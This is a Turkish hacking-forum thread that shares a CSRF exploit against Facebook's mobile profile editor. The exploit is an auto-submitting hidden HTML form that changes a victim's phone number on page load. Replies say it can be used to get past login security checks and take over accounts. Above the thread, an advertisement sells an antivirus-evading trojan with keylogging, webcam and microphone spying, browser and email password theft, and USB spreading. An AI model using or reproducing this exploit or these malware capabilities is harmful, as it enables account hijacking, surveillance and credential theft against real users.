Facebook Csrf

Etkilenen bağlantı: http://m.facebook.com/a/editprofile.php Açık : CSRF Exploit:

Konu m0liver tarafından açılmış, 1087 kişi tarafından görüntülenip, 14 yanıt almış.

Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!


Karşı sistemi kendi makineniniz gibi kullandıran uzaktan yönetim programı.
  • Canlı ekran izleme,vnc ve mouse kontrolü
  • Antiviruslerce %100 tanınmaz, güncelleme garantili
  • Ortam sesi dinleme
  • Webcam izleme
  • Online/offline keylogger
  • Kopyala/Yapıştır, Clipboard Yöneticisi (Canlı)
  • Warlogger desteği
  • Çalıştırma,upload,download,yeniden adlandırma,silme,gizli çalıştırma,thumbnail görüntüleme(indirmeden dosya görme)
  • Registry yöneticisi (tam özellikli)
  • Msn şifrelerini ve geçmişteki tüm adresleri çıkartma
  • Firefox şifrelerini çözme
  • Görev yöneticisi, görev sonlandırma
  • Çalışan programları listeleme
  • Bağlı sistemlerin yaptığı işlemleri tek listede görme!
  • Binder / dosya birleştirici
  • Virus tipinde resource kullanmadan bindleme özelliği
  • Mp3,resim,jpeg,vs her türlü dosya ile birleşip,exploitler ile link üzerinden,htmlden yayılır
  • Keyloggerda dll kullanmadan system hooklarıyla loglama ve tabii dll kullanmadan kimse yapamıyorken %100 sisteme zarar vermeden stabil bütün dünya dillerinde loglama.
  • Internet Explorer 9 şifre çözme
  • Chrome Şifreleri (bütün sürümler)
  • Firefox Şifreleri (bütün sürümler)
  • Internet Exporer Şifreleri (bütün sürümler)
  • Safari Şifreleri (bütün sürümler)
  • Reklam Bot ile site reklamı, dosya yükletme, bulaştırma,vs. MSN,Yahoo Messenger,ICQ ve AIM sistemlerinin hepsini tanır. Reklam bot aynı anda birden fazla sisteme komut verebilir.
  • Browserda geçmiş verileri, form girdilerini kayıt edip trojandan erişme
  • Klavye Kilitleme
  • Mouse Kilitleme
  • Masaüstü Gizleme
  • Sistemlere takılı flash/usb disk varsa bulaştırma Birden fazla sisteme aynı anda autorun oluşturabilir.
  • Uzaktan exe yükletme Aynı anda birden fazla sisteme exeleri tek komutla yükletebilir.
  • Fake sistem kilitleme. Tek tıklama ile karşı sistemi restart/yeniden başlat moduna geçmiş gösterip kilitleme. Kullanıcı fişten çekmediği sürece siz istemedikçe bilgisayarı kapatamaz, yeniden başlatamaz.
  • Karşı sistemin yeniden başlatılma talebinde masaustu ve bütün ekranı kapanıyor gibi gösterip kapanış sesini çalara kullanıcıyı bekletme. Kullanıcı sistemi kapatmak istediğinde siz izin vermezseniz windows kapanmaya çalışıyor gibi görünür ancak yonetim panelinden her türlü işlem yapılır.
  • Sistem servislerini yönetme
  • Outlook şifreleri çözme. (bütün outlook versiyonları outlook expressler dahil)
  • Otomatik güncelleme özelliği ile yakalanma durumunda kısa sürede otomatik güncelleme alma
Sadece 690 TL! Satın almak için iletişim formunu kullanabilirsiniz.


Ayrıca, iki farklı üst sürümü var:
Özel Trojan 990 TL: İstediğiniz isimle çalışıp, istediğiniz yere kopyalanır ve başlangıçta, msconfig'de, registry'de görünmez.
ÖZEL TROJAN 1490 TL: Görev yöneticisinde ve sistemin hiç bir yerinde görünmez.


Sürümler: 1200 TL: - Kimsenin bulamayacağı şekilde çalışır!> m3hm3t. 1750 TL: %100 gizlidir, RAM'de çalışır ve bentrojanim.exe olarak çalışsa dahi hiç bir yerde görünmez.

Wardom.Com.TR bir bilgisayar güvenliği sitesidir; hack konuları bilgisayar güvenliğinin ve bilgisinin uç noktaları olduğundan dolayı, kullanıcıları bu konularda bilgilendirmek ve güvenliklerini arttırmak için yazılmaktadır.

Geri Dön   Wardom.Com.TR > Bilgisayar Güvenliği > Exploiting
Üye Ol Sözlük Üye Listesi Arama Yeni Mesajlar Forumları Okundu İşaretle

Konu Başlıkları: csrf facebook
Üye Olmadan Yorum Yazmak İçin Tıklayın!
Facebook Csrf konusundaki toplam yorum: 14, okunma sayısı: 1087.
 
Eski 15-02-2010, 05:00   #1
m0liver
Forum Ustası
 
m0liver's Avatar
 
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,998
Karma etkisi: 6264 m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000
Karma: 625645
Facebook Csrf

Etkilenen bağlantı:
Kod:
http://m.facebook.com/a/editprofile.php
Açık :
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=350076
CSRF

Exploit:

Kod:
<html>
<head>
<script>
function send() {
document.forms[0].submit();
}
</script>
</head>

<body onload="send();">
<form
action="http://m.facebook.com/a/editprofile.php?edit=phone_cell&type=contact";
method="post">
<input type="hidden" name="phone_num" value="600000000">
<input type="hidden" name="save" value="">
</form>
</body>
</html>
m0liver Çevrimdışı   Alıntı Yaparak Cevapla

Görüntülediğiniz konu içerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanunun 8. Maddesine ve T.C.Knın 125. Maddesine göre yayınlanmakta olup içeriğinden yazarı sorumludur. Bu konu hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.
Eski 15-02-2010, 05:01   #2
slizyoke
1st Class WarrioR
 
slizyoke's Avatar
 
Kayıt Tarihi: Sep 2007
Üye numarası: #145921
Yer: Denizli
Mesaj sayısı: 996
Karma etkisi: 369 slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000slizyoke seviye: 2000
Karma: 36443

ne işe yaradığını sorabilir miyim ?
slizyoke Çevrimdışı   Alıntı Yaparak Cevapla

Eski 15-02-2010, 05:27   #3
Balamir
Banned
 
Balamir's Avatar
 
Kayıt Tarihi: Dec 2004
Üye numarası: #975
Yer: Melbourne
Mesaj sayısı: 17,152
Karma etkisi: 0 Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000Balamir seviye: 2000
Karma: 8202997
6.Oskar ödülü kazanan üyelerimiz. Wardom Destekçisi 

Ne işe yaradığı hakkında geniş bir döküman burada mevcut ayrıca facebook'a farklı ip'lerden girişlerde güvenlik kodu sorar onları sorunsuzca aşıp hesaba bağlanmak için kullana bilirsiniz

Düzenleyen Balamir : 15-02-2010 at 05:31.
Balamir Çevrimdışı   Alıntı Yaparak Cevapla

Eski 15-02-2010, 08:03   #4
HoverLeDCoMe09
Forum Kalfası
 
HoverLeDCoMe09's Avatar
 
Kayıt Tarihi: Dec 2009
Üye numarası: #394281
Yer: C:\WINDOWS\system32
Mesaj sayısı: 1,564
Karma etkisi: 10719 HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000HoverLeDCoMe09 seviye: 2000
Karma: 1071568

TeşekkürLer GüzeL Bi PayLaŞıM...
HoverLeDCoMe09 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 15-02-2010, 08:31   #5
RudraL
Daimi Üye
 
RudraL's Avatar
 
Kayıt Tarihi: Sep 2008
Üye numarası: #255636
Mesaj sayısı: 311
Karma etkisi: 1604 RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000RudraL seviye: 2000
Karma: 160074
1stClass Üye 

Bu açıktan direk kullanıcı şifresi elde etmek mümkün değil di mi?
RudraL Çevrimdışı   Alıntı Yaparak Cevapla

Eski 15-02-2010, 09:17   #6
KuTsaL
Hızlı Çırak
 
KuTsaL's Avatar
 
Kayıt Tarihi: May 2005
Üye numarası: #21286
Mesaj sayısı: 89
Karma etkisi: 394 KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000KuTsaL seviye: 2000
Karma: 38760

Alıntı:
Orjinal Mesaj Sahibi Balamir Mesajı Göster
Ne işe yaradığı hakkında geniş bir döküman burada mevcut ayrıca facebook'a farklı ip'lerden girişlerde güvenlik kodu sorar onları sorunsuzca aşıp hesaba bağlanmak için kullana bilirsiniz

ingilizce oldugundan bişey anlamadım ne işe yarıyo ki bu ...
KuTsaL Çevrimdışı   Alıntı Yaparak Cevapla

Eski 15-02-2010, 19:11   #7
brk35.
Daimi Üye
 
Kayıt Tarihi: Nov 2009
Üye numarası: #391112
Mesaj sayısı: 332
Karma etkisi: 76 brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000brk35. seviye: 2000
Karma: 7380

daha acık anlatırmısın arkadasım
ne ıse yarıyor ve nasıl kullanabılırız
brk35. Çevrimdışı   Alıntı Yaparak Cevapla

Eski 15-02-2010, 19:17   #8
medcezir896
Hızlı Çırak
 
Kayıt Tarihi: Feb 2010
Üye numarası: #423252
Mesaj sayısı: 77
Karma etkisi: 3 medcezir896 seviye: 10
Karma: 10

neymiş bu ?
medcezir896 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 15-02-2010, 19:26   #9
fearless19
Forum Kalfası
 
fearless19's Avatar
 
Kayıt Tarihi: Nov 2009
Üye numarası: #388974
Yer: Yemez
Mesaj sayısı: 1,228
Karma etkisi: 5642 fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000fearless19 seviye: 2000
Karma: 563823
Kullanıcıya MSN yolu ile mesaj gönder

Aynen hic bisey anlamadm İngilzce site
fearless19 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 15-02-2010, 22:01   #10
m0liver
Forum Ustası
 
m0liver's Avatar
 
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,998
Karma etkisi: 6264 m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000
Karma: 625645

Kod:
http://www.wardom.org/hacking-teknikleri-2-csrf-saldirilari-t162594.html
buradan inceleyin...

Google'da çok döküman var; ayrıca ingilizce bilmeden bu işlerde yol alamazsınız...

iyi çalışmalar
m0liver Çevrimdışı   Alıntı Yaparak Cevapla

Eski 13-03-2010, 17:24   #11
pelinduman87
Çırak
 
Kayıt Tarihi: Mar 2010
Üye numarası: #433396
Mesaj sayısı: 2
Karma etkisi: 0 pelinduman87 seviye: 10
Karma: 10

Yaaaa arkadaslar sabahtır XSS sniffer cookie CSRF geze geze basım dondu
Xss tmm Cookie de tmm da SNIFFER ıle CSRF yi anlamadm ve bu isi ogrenmek istiyorm bna yardımcı olamaz mısınız? kafayı yicem =(( bi yetkili pm atabilirse msn verim su isi ogretin bna ya lutfeeeeeeeeeeeennn =(
pelinduman87 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 13-03-2010, 17:26   #12
pelinduman87
Çırak
 
Kayıt Tarihi: Mar 2010
Üye numarası: #433396
Mesaj sayısı: 2
Karma etkisi: 0 pelinduman87 seviye: 10
Karma: 10

Ingilizcem de orta seviyede ama bir turlu cozemedim bu isi lutfen yardm yaaaa =(
pelinduman87 Çevrimdışı   Alıntı Yaparak Cevapla

Eski 13-03-2010, 22:08   #13
m0liver
Forum Ustası
 
m0liver's Avatar
 
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,998
Karma etkisi: 6264 m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000
Karma: 625645

Orada javascript kodları var. Javascript bilmeden anlayamazsınız.
Snifferlar asp veya php olur bunları bilmeden anlayamazsınız
m0liver Çevrimdışı   Alıntı Yaparak Cevapla

Eski 13-03-2010, 22:08   #14
m0liver
Forum Ustası
 
m0liver's Avatar
 
Kayıt Tarihi: Oct 2006
Üye numarası: #96379
Mesaj sayısı: 2,998
Karma etkisi: 6264 m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000m0liver seviye: 2000
Karma: 625645

Orada javascript kodları var. Javascript bilmeden anlayamazsınız.
Snifferlar asp veya php olur bunları bilmeden anlayamazsınız
m0liver Çevrimdışı   Alıntı Yaparak Cevapla

Eski 13-03-2010, 22:46   #15
controlsuz
Daimi Üye
 
controlsuz's Avatar
 
Kayıt Tarihi: Dec 2009
Üye numarası: #402729
Mesaj sayısı: 341
Karma etkisi: 4977 controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000controlsuz seviye: 2000
Karma: 497432

teşekkürler , yakında faceninde sahibi wardom olacak
controlsuz Çevrimdışı   Alıntı Yaparak Cevapla

Üye Olmadan Yorum Yazmak İçin Tıklayın!
Konudaki toplam yorum: 14, okunma sayısı: 1087.
Cevapla





Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir)
 
Konu Araçları Bu Konuda Ara
Bu Konuda Ara:

Gelişmiş Arama

Gönderme Kuralları
You may not post new threads
You may post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smilies Açık
[IMG] Kodu Açık
HTML Kodu Kapalı

Forum Seç


Hacking ve Bilgisayar Güvenliği Öğrenmek İçin!

Forum saati Türkiye saatine göredir. GMT +3. Şuan saat: 17:02.
(Türkiye için GMT +2 seçilmelidir.)


Wardom.org



İçerik sağlayıcı paylaşım sitelerinden biri olan Wardom Internet Adresimizde 5651 Sayılı Kanun’un 8. Maddesine ve T.C.K’nın 125. Maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur. Wardom hakkında yapılacak tüm hukuksal şikayetler için webmaster \@wardom.org adresi ile iletişime geçilmesi halinde ilgili kanunlar ve yönetmelikler çerçevesinde en geç 3 (üç) gün içerisinde Wardom yönetimi olarak tarafımızca gereken işlemler yapılacak ve avukatlarımız size dönüş yapacaktır.